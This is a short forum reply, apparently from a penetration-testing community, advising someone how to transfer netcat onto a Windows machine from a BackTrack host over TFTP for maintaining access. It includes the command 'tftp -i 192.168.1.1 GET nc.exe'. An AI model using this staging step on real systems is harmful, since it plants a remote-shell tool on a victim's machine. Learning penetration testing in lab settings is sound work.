There's an enitire module for maintaining access in the Metasploit Unleashed - Mastering the Framework course.
Are you sure there is no tftp client in Windows? Suppose you enable the tftp server in BT. Luckily for you, there happens to be nc.exe for Windows located somewhere in your BT machine. Then it would be a good idea to copy it to your /tmp folder.
From Windows open cmd and run:
Change the IP ofcourse to your BT machine. Also note, what directory you are in when you first start cmd, as that's where the file will end up. Post back your results.Code:tftp -i 192.168.1.1 GET nc.exe




You learn a LOT in that
